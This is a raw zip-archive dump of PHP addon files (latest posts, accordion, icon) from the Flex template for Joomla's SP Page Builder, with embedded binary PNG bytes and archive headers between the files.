			. '@media screen and (min-width: 992px) and (max-width: 1199px){'
			. '.columns-'.$column_no.'{width:33.3333%;}'
			. '}'
			. '@media screen and (min-width: 768px) and (max-width: 991px){'
			. '.columns-'.$column_no.'{width:50%}'
			. '}'
			. '@media screen and (max-width: 767px){'
			. '.columns-'.$column_no.'{width:100%}'
			. '}';
	$doc->addStyleDeclaration($custom_style_5);
	
	}
	
	if ($enable_masonry == '1' && $column_no > '1') {
		// Add masonry js
		$js ='jQuery(function($){
		$("#lp-'.$randomid.'").imagesLoaded(function(){
			$("#lp-'.$randomid.'").masonry({
			  itemSelector:\'.masonry_item\'
			});
		}); 
		});';
		$js = preg_replace(array('/([\s])\1+/', '/[\n\t]+/m'), '', $js); // Remove whitespace
		$doc->addScriptdeclaration($js);
	}
	
	return $output;
	
}
PK!���:=flex/sppagebuilder/addons/latest_posts/assets/images/icon.pngnu&1i��PNG


IHDR@@�iq�tEXtSoftwareAdobe ImageReadyq�e<�IDATx��[YLQ��ф����m5@�B���%(?.���SD>Uc"߀?&FL�01�5����!�(�Q��b5Q>��͔�N��L�,tz�ۙyә;��{Ͻ�u���F���l�l��M혛17�����?��7�o�_�7'!:�~ׁ�Ղ��'�ͳ(��p<��M��׽[�� -(O�Jt%:���x{4BVVg�j��^�&��P�w^�$V�<�R3�׎F���Qm�b<��*e�,��E�!>!�ۖF��>�38�Qܔ[���b����L���C��L���@+�c���R�3N%0K�T��c{%Bε�<�e�F(,��hr\�.�`�y!"a݆#�
&R`"J��v��+�_?{����:0 R��32t?ZÃ^[%	{�^o�4��e%B@�t��*6g��@��Ĝ���7�ݽ��������� q��S@����'H˴�y��򄒰WL,�~RĠ�b��#�l;O�7�{X�/�<>c���0@,���A
���eΞ'~`�K��Ι%H�
��|}�r�[g�E�����4�D���kC�o���y�pz�z�8������O~���6��'$�/� ޾�}�R̸�,A� 	���[arb:ש˗àٶ�6�/�fy�퉗C(S
#�1�/t�x����߻{��Z�VV��o,9��3�C������4��\
>P"��Z�ac)�7��^/�b�EC���s(����(׬�`1�����-�|T@���8�L5à����P����%E�3�&*���_QF�����49[%����4QP<�1O�ҤlHMϓ��_�r��WU!��z�v;%{ة�1�@� ?$��t:n*�r��B��/�x(D˓�A���\C֪R�'�K�.�]�]!��7#$(���!-C�:>7�k�knP�gF�7�#I�~FNp�ry@�W���@��+^u��XP��z!��h0V�=�/D@�BH-iP����,�sw�aE���&&.�%Ӡ9o��d!�{�x�]�h��+�҂��F�1�y@tPlF"�**�F�o'Ьah&�
7��v�aQ�}��bwYCg�X���|uk���R3���yv����Z:{�D���>�����Xq��Ӿt���Q�|�X��>��۾.�1�'IEND�B`�PK!%�Z�'�'0flex/sppagebuilder/addons/latest_posts/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_latest_posts',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_DESC'),
		'category'=>'Flex',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),
	
				'title'=>array(
					'type'=>'text', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
					'std'=>'',
					),
	
				'heading_selector'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
						),
					'std'=>'h3',
				),
				'show_image'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_IMG'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_IMG_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1,
					),
				'show_date'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_DATE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_DATE_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1,
					),	
				'date_format'=>array(
					'type'=>'select',
					'title'=>JText::_('FLEX_GLOBAL_DATE_FORMAT'),
					'desc'=>JText::_('FLEX_GLOBAL_DATE_FORMAT_DESC'),
					'values'=>array(
						'DATE_FORMAT_LC1'=>JText::_('DATE_FORMAT_LC1: Tuesday, 07 October 2019 (l, d F Y)'),
						'DATE_FORMAT_LC2'=>JText::_('DATE_FORMAT_LC2: Tuesday, 07 October 2009 14:15 (l, d F Y H:i)'),
						'DATE_FORMAT_LC3'=>JText::_('DATE_FORMAT_LC3: 07 October 2019 (d F Y)'),
						'DATE_FORMAT_LC4'=>JText::_('DATE_FORMAT_LC4: 2019-10-07 (Y-m-d)'),
						'DATE_FORMAT_JS1'=>JText::_('DATE_FORMAT_JS1: 19-10-07 (y-m-d)'),
					),
					'std'=>'DATE_FORMAT_LC1',
					'depends'=> array(
						array('show_date', '=', '1'),
					)
				),
		
				'show_intro_text'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_INTROTEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_INTROTEXT_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1,
				),
				'intro_text_limit'=>array(
					'type'=>'number', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_INTROTEXT_LIMIT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_INTROTEXT_LIMIT_DESC'),
					'std'=>'100',
					'depends'=>array('show_intro_text'=>'1')
					),
				'show_author'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_AUTHOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_AUTHOR_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1,
				),
					
				'show_readmore'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('FLEX_ADDON_READMORE'),
					'desc'=>JText::_('FLEX_ADDON_READMORE_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>0,
					),
								
				//Readmore Button
				'readmore_button'=>array(
					'type'=>'text',
					'title'=>JText::_('FLEX_ADDON_READMORE_BUTTON_TEXT'),
					'desc'=>JText::_('FLEX_ADDON_READMORE_BUTTON_TEXT_DESC'),
					'std'=>'Read More',
					'depends'=>array('show_readmore'=>'1')
				),
				'readmore_button_position'=>array(
					'type'=>'select',
					'title'=>JText::_('FLEX_ADDON_READMORE_BUTTON_POSITION'),
					'values'=>array(
						'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'depends'=>array('show_readmore'=>'1')
				),
		
				'button_type'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE_DESC'),
					'values'=>array(
						'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
						'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
						'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
						'light'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LIGHT'),
						'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
						'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
						'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
						'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
						'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
						'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
					),
					'std'=>'default',
					'depends'=> array(
						array('show_readmore', '=', '1'),
						array('button_text', '!=', ''),
					)
				),
	
				'button_appearance'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_FLAT'),
						'outline'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_OUTLINE'),
						'3d'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_3D'),
					),
					'std'=>'flat',
					'depends'=> array(
						array('show_readmore', '=', '1'),
						array('button_text', '!=', ''),
					)
				),
	
				'button_size'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DEFAULT'),
						'lg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_LARGE'),
						'xlg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_XLARGE'),
						'sm'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_SMALL'),
						'xs'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_EXTRA_SAMLL'),
					),
					'depends'=> array(
						array('show_readmore', '=', '1'),
						array('button_text', '!=', ''),
					)
				),
	
				'button_shape'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_DESC'),
					'values'=>array(
						'rounded'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUNDED'),
						'square'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_SQUARE'),
						'round'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUND'),
					),
					'depends'=> array(
						array('show_readmore', '=', '1'),
						array('button_text', '!=', ''),
					)
				),
	
				'button_block'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK_DESC'),
					'values'=>array(
						''=>JText::_('JNO'),
						'sppb-btn-block'=>JText::_('JYES'),
					),
					'depends'=> array(
						array('show_readmore', '=', '1'),
						array('button_text', '!=', ''),
					)
				),
		
				'show_category'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_CATEGORY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_CATEGORY_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1,
					),
				'item_limit'=>array(
					'type'=>'number', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_LIMIT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_LIMIT_DESC'),
					'std'=>'6'
					),	
				'column_no'=>array(
					'type'=>'select', 
					'title'=>JText::_('FLEX_LATEST_POSTS_COLUMN_NO'),
					'desc'=>JText::_('FLEX_LATEST_POSTS_COLUMN_NO_DESC'),
					'values'=>array(
						'1'=>JText::_('1'),
						'2'=>JText::_('2'),
						'3'=>JText::_('3'),
						'4'=>JText::_('4'),
						'5'=>JText::_('5'),
						'6'=>JText::_('6'),
						),
					'std'=>'3',
				),
				'image_alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('FLEX_LATEST_POSTS_IMAGE_ALIGNMENT'),
					'desc'=>JText::_('FLEX_LATEST_POSTS_IMAGE_ALIGNMENT_DESC'),
					'values'=>array(
						'left'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_LEFT'),
						'right'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_RIGHT'),
						),
					'std'=>'left',
					'depends'=>array('column_no'=>'1')
				),
				'category'=>array(
					'type'=>'category',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_SELECT_CATEGORY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_SELECT_CATEGORY_DESC'),
					'std'=>''
					),
					
				'enable_masonry'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('FLEX_ADDON_ENABLE_MASONRY'),
					'desc'=>JText::_('FLEX_ADDON_ENABLE_MASONRY_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>0,
					'depends'=>array(array('column_no', '!=', '1')),
				),
			
				'style'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_TYPE'),
					'desc'=>JText::_(''),
					'values'=>array(
						'default'=>JText::_('Default'),
						'blog'=>JText::_('Blog'),
						'flex'=>JText::_('Flex'),
						),
					'std'=>'Default',
				),
				'class'=>array(
						'type'=>'text',
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
						'std'=>''
				),
			),
		),
	)
);PK!)*l�>>,flex/sppagebuilder/addons/accordion/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('restricted access');

class SppagebuilderAddonAccordion extends SppagebuilderAddons {

	public function render() {

		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';
		$style = (isset($this->addon->settings->style) && $this->addon->settings->style) ? $this->addon->settings->style : 'panel-flex';
		$title = (isset($this->addon->settings->title) && $this->addon->settings->title) ? $this->addon->settings->title : '';
		$heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h3';
		
		$output   = '';
		$output  = '<div class="sppb-addon sppb-addon-accordion ' . $class . '">';

		if($title) {
			$output .= '<'.$heading_selector.' class="sppb-addon-title">' . $title . '</'.$heading_selector.'>';
		}

		$output .= '<div class="sppb-addon-content">';
		$output	.= '<div class="sppb-panel-group">';

		foreach ($this->addon->settings->sp_accordion_item as $key => $item) {
			
			// Pixeden icons
			$peicon_name = (isset($item->peicon_name) && $item->peicon_name) ? $item->peicon_name : '';
			// FontAwesome icons
			$fa_icon = (isset($item->icon) && $item->icon) ? $item->icon : '';
			
			$output  .= '<div class="sppb-panel sppb-'. $style .'">';
			$output  .= '<div class="sppb-panel-heading'. (($key == 0) ? ' active' : '') .'">';
			$output  .= '<span class="sppb-panel-title">';

			if ($peicon_name) {
				$output .= '<i class="pe ' . $peicon_name . '"></i>';
			} else {
				if($fa_icon != '') {
				   $output .= '<i class="fa ' . $fa_icon . '"></i>';
				}
			}

			$output  .= $item->title;
			$output  .= '</span>';
			$output  .= '<span class="sppb-toggle-direction">' . (($style != 'panel-flex' && $style != 'panel-default' && $style != 'panel-primary') ? '<i class="fa fa-angle-right"></i>' : '') . '</span>';
			$output  .= '</div>';
			$output  .= '<div class="sppb-panel-collapse"' . (($key != 0) ? ' style="display: none;"' : '') . '>';
			$output  .= '<div class="sppb-panel-body">';
			$output  .= $item->content;
			$output  .= '</div>';
			$output  .= '</div>';
			$output  .= '</div>';
		}

		$output  .= '</div>';
		$output  .= '</div>';
		$output  .= '</div>';

		return $output;
	}

	public function js() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$openitem = (isset($this->addon->settings->openitem) && $this->addon->settings->openitem) ? $this->addon->settings->openitem : '';
		if ($openitem) {
			$js ="jQuery(document).ready(function($){'use strict';
				$( '".$addon_id."' + ' .sppb-addon-accordion .sppb-panel-heading').removeClass('active');
				$( '".$addon_id."' + ' .sppb-addon-accordion .sppb-panel-collapse')." . $openitem . "();
			});";
			return $js;
		}
		return ;
	}

	public static function getTemplate()
	{
		$output = '<div class="sppb-addon sppb-addon-accordion {{ data.class }}">
			<# if( !_.isEmpty( data.title ) ){ #><{{ data.heading_selector }} class="sppb-addon-title">{{ data.title }}</{{ data.heading_selector }}><# } #>
			<div class="sppb-addon-content">
				<div class="sppb-panel-group">
					<# _.each(data.sp_accordion_item, function(accordion_item, key){ #>
						<# var activeClass = ((key == 0 || data.openitem == "show") &&  data.openitem != "hide") ? "active" : ""; #>
						<div class="sppb-panel sppb-{{ data.style }}">
							<div class="sppb-panel-heading {{ activeClass }}">
								<span class="sppb-panel-title">
								
								<# if(accordion_item.peicon_name){ #>
									<i class="pe {{ accordion_item.peicon_name }}"></i>
								<# } else { #>
									<# if(accordion_item.icon != ""){ #>
										<i class="fa {{ accordion_item.icon }}"></i>
									<# } #>
								<# } #>

									{{ accordion_item.title }}
								</span>
								<span class="sppb-toggle-direction"></span>
							</div>
							<# var panelStyle = ((key != 0 || data.openitem == "hide") && data.openitem != "show") ? "display: none;" : ""; #>
							<div class="sppb-panel-collapse" style="{{ panelStyle }}">
								<div class="sppb-panel-body">
									<#
									var htmlContent = "";
									_.each(accordion_item.content, function(content){
										htmlContent += content;
									});
									#>
									{{{ htmlContent }}}
								</div>
							</div>
						</div>
					<# }); #>
				</div>
			</div>
		</div>';
		return $output;
	}

}
PK!$�G66-flex/sppagebuilder/addons/accordion/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('restricted aceess');

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
array(
	'type'=>'repeatable',
	'addon_name'=>'accordion',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_DESC'),
	'category'=>'Content',
	'attr'=>array(
		'general' => array(
			'admin_label'=>array(
				'type'=>'text',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
				'std'=> ''
			),

			'title'=>array(
				'type'=>'text',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
				'std'=>  ''
			),

			'heading_selector'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
				'values'=>array(
					'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
					'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
					'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
					'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
					'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
					'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
				),
				'std'=>'h3',
				'depends'=>array(array('title', '!=', '')),
			),

			'title_font_family'=>array(
				'type'=>'fonts',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY_DESC'),
				'depends'=>array(array('title', '!=', '')),
				'selector'=> array(
					'type'=>'font',
					'font'=>'{{ VALUE }}',
					'css'=>'.sppb-addon-title { font-family: {{ VALUE }}; }'
				)
			),

			'title_fontsize'=>array(
				'type'=>'slider',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
				'std'=>'',
				'depends'=>array(array('title', '!=', '')),
				'responsive' => true,
				'max'=> 400,
			),

			'title_lineheight'=>array(
				'type'=>'slider',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
				'std'=>'',
				'depends'=>array(array('title', '!=', '')),
				'responsive' => true,
				'max'=> 400,
			),

			'title_font_style'=>array(
				'type'=>'fontstyle',
				'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
				'depends'=>array(array('title', '!=', '')),
			),

			'title_letterspace'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
				'values'=>array(
					'0'=> 'Default',
					'1px'=> '1px',
					'2px'=> '2px',
					'3px'=> '3px',
					'4px'=> '4px',
					'5px'=> '5px',
					'6px'=>	'6px',
					'7px'=>	'7px',
					'8px'=>	'8px',
					'9px'=>	'9px',
					'10px'=> '10px'
				),
				'std'=>'0',
				'depends'=>array(array('title', '!=', '')),
			),

			'title_text_color'=>array(
				'type'=>'color',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
				'depends'=>array(array('title', '!=', '')),
			),

			'title_margin_top'=>array(
				'type'=>'slider',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
				'placeholder'=>'10',
				'depends'=>array(array('title', '!=', '')),
				'responsive' => true,
				'max'=> 400,
			),

			'title_margin_bottom'=>array(
				'type'=>'slider',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
				'placeholder'=>'10',
				'depends'=>array(array('title', '!=', '')),
				'responsive' => true,
				'max'=> 400,
			),

			'style'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_STYLE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_STYLE_DESC'),
				'values'=> array(
					'panel-modern'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MODERN'),
					'panel-flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
					'panel-default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
					'panel-primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
					'panel-success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
					'panel-info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
					'panel-warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
					'panel-danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
					'panel-faq'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_STYLE_FAQ'),
				),
				'std'=> 'panel-modern'
			),

			'openitem'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_OPEN_ITEM'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_OPEN_ITEM_DESC'),
				'values'=> array(
					''=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_OPEN_FIRST_ITEM'),
					'show'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_OPEN_ALL_ITEM'),
					'hide'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_CLOSE_ALL_ITEM'),
				),
				'std'=> ''
			),

			'class'=>array(
				'type'=>'text',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
				'std'=>''
			),

			// Repeatable Item
			'sp_accordion_item'=>array(
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_ITEMS'),
				'attr'=>array(
					'title'=>array(
						'type'=>'text',
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_TITLE'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_TITLE_DESC'),
						'std'=>'Accordion Title',
					),
					'peicon_name'=>array( // Pixeden Icons
						'type'=>'select', 
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
						'values'=> $peicon_list
					),
					'icon'		=>	array(
						'type'	=>	'icon',
						'title'	=>	JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_ICON'),
						'desc'	=>	JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_ICON_DESC'),
						'std'		=> 	''
					),
					'content'	=>	array(
						'type'	=>	'builder',
						'title'	=>	JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_CONTENT'),
						'desc'	=>	JText::_('COM_SPPAGEBUILDER_ADDON_ACCORDION_CONTENT_DESC'),
						'std'=> 'Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod. Brunch 3 wolf moon tempor, sunt aliqua put a bird on it squid single-origin coffee nulla assumenda shoreditch et.'
					),
				),
			),
		),
	),
	)
);
PK!WݎE�E'flex/sppagebuilder/addons/icon/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

class SppagebuilderAddonIcon extends SppagebuilderAddons {

	public function render() {

		$class = (isset($this->addon->settings->alignment) && $this->addon->settings->alignment) ? ' ' . $this->addon->settings->alignment : '';
		$class .= (isset($this->addon->settings->hover_effect) && $this->addon->settings->hover_effect) ? ' sppb-icon-hover-effect-' . $this->addon->settings->hover_effect : '';
		$peicon_name = (isset($this->addon->settings->peicon_name) && $this->addon->settings->peicon_name) ? $this->addon->settings->peicon_name : '';
		$icon_name = (isset($this->addon->settings->icon_name) && $this->addon->settings->icon_name) ? $this->addon->settings->icon_name : '';
		$css_class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';

		if($icon_name || $peicon_name) {
			$output   = '<div class="sppb-icon ' . $class . '">';
			$output  .= '<span class="sppb-icon-inner ' . $css_class . '">';
			
			if ($peicon_name != '') {
				$output  .= '<i class="pe ' . $peicon_name . '"></i>';
			}else{
				$output  .= '<i class="fa ' . $icon_name . '"></i>';
			}
			$output  .= '</span>';
			$output  .= '</div>';
			return $output;
		}
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;

		// Normal
		$icon_style  = '';
		$icon_style_sm  = '';
		$icon_style_xs  = '';

		$font_size = '';
		$font_size_sm = '';
		$font_size_xs = '';

		if(isset($this->addon->settings->margin) && trim($this->addon->settings->margin) != ""){
			$margin_md = '';
			$margins = explode(' ', $this->addon->settings->margin);
			foreach($margins as $margin){
				if(empty(trim($margin))){
					$margin_md .= ' 0';
				} else {
					$margin_md .= ' '.$margin;
				}

			}
			$icon_style .= "margin: " . $margin_md . ";\n";
		}

		if(isset($this->addon->settings->margin_sm) && trim($this->addon->settings->margin_sm) != ""){
			$margin_sm_full = '';
			$margins_sm = explode(' ', $this->addon->settings->margin_sm);
